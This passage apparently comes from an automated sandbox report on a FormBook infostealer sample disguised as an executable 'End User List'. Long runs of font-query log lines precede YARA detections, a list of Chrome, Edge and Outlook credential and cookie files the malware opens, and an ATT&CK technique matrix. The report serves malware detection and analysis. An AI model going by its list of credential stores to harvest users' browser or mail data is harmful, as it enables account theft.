                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.022QCX_End_User_List_2025.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.022QCX_End_User_List_2025.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2063942175.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2942300801.0000000005680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058828430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938382440.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2940757113.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2940659392.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2940387871.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2066777958.0000000001FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.022QCX_End_User_List_2025.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.022QCX_End_User_List_2025.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2063942175.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2942300801.0000000005680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058828430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938382440.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2940757113.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2940659392.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2940387871.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2066777958.0000000001FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		3
                Virtualization/Sandbox Evasion                		LSASS Memory3
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Disable or Modify Tools                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
